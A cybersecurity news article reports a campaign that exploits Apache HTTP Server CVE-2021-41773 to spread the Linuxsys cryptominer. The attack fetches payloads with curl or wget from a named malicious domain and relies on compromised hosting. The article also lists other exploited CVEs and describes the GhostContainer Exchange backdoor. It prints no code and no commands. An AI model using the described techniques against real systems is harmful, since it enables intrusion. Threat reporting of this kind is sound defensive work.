New Cybersecurity Threat: Exploitation of Apache HTTP Server Vulnerability to Distribute Cryptocurrency Miner

Discovery of a New Malware Campaign

Cybersecurity experts have identified a recent campaign that takes advantage of a known vulnerability in the Apache HTTP Server to deploy a cryptocurrency miner named Linuxsys. This campaign exploits the CVE-2021-41773 vulnerability, which has a high severity rating of 7.5, allowing for potential remote code execution on affected systems.

Attack Methodology

According to a report from VulnCheck shared with The Hacker News, attackers are utilizing compromised legitimate websites to spread malware, which facilitates stealthy delivery and minimizes the chances of detection. The infection process, traced back to an Indonesian IP address, involves fetching a secondary payload from a site named “repositorylinux.org” using tools like curl or wget.

This secondary payload consists of a shell script that downloads the Linuxsys cryptocurrency miner from multiple legitimate websites, indicating that the attackers have successfully breached third-party infrastructures to aid in malware distribution.

Evasion Tactics

VulnCheck highlighted that this method is particularly effective because victims connect to trusted hosts with valid SSL certificates, making it harder for security systems to detect the malicious activity. Furthermore, the compromised sites host an additional shell script named “cron.sh,” which ensures that the miner starts automatically whenever the system reboots. The cybersecurity firm also discovered two Windows executables on these hacked sites, suggesting that the attackers may also target Windows operating systems.

Historical Context of the Attacks

Notably, the Linuxsys miner has previously exploited a critical vulnerability in OSGeo GeoServer GeoTools, demonstrating a pattern of targeting various vulnerabilities over time. The shell script associated with this campaign was found to have comments written in Sundanese, indicating a potential link to Indonesian attackers. This particular script has been observed in the wild since December 2021.

Other Vulnerabilities in Use

In recent years, several other vulnerabilities have been exploited to deliver the Linuxsys miner, including:

• CVE-2023-22527: A template injection flaw in Atlassian Confluence.
• CVE-2023-34960: A command injection vulnerability in Chamilo Learning Management Systems.
• CVE-2023-38646: A command injection issue in Metabase.
• CVE-2024-0012 and CVE-2024-9474: Authentication bypass and privilege escalation vulnerabilities in Palo Alto Networks firewalls.

These findings suggest that the attackers are engaged in a long-term strategy, employing consistent techniques such as exploiting known vulnerabilities, staging content on compromised hosts, and mining cryptocurrency on infected machines.

Targeting Strategies and Evasion Techniques

The attackers appear to be strategically selective, avoiding low-interaction honeypots and requiring high levels of interaction to observe their activities. This, combined with the use of compromised hosts for malware distribution, has significantly reduced the likelihood of detection.

GhostContainer Backdoor Targeting Exchange Servers

In a related development, Kaspersky has revealed a campaign targeting government entities in Asia, utilizing a security flaw in Microsoft Exchange Server to deploy a custom backdoor known as GhostContainer. This backdoor is believed to exploit a now-patched remote code execution vulnerability in Exchange Server.

The GhostContainer backdoor is described as sophisticated and multi-functional, allowing attackers to extend its capabilities by downloading additional modules. It grants full control over the Exchange server, enabling a wide range of malicious activities, including executing shell commands and downloading files.

The attackers behind GhostContainer are suspected to be highly skilled, given their deep understanding of Microsoft Exchange Server and their ability to convert publicly available code into advanced espionage tools. Notably, the backdoor does not connect to any command-and-control infrastructure; instead, the attackers issue commands through normal Exchange web requests, further complicating detection efforts.

In summary, the evolving landscape of cybersecurity threats underscores the importance of vigilance and proactive measures to safeguard systems against sophisticated attacks.

Disclaimer: This article is provided for informational purposes only and does not constitute financial advice. Readers are encouraged to conduct their own research before making any investment decisions.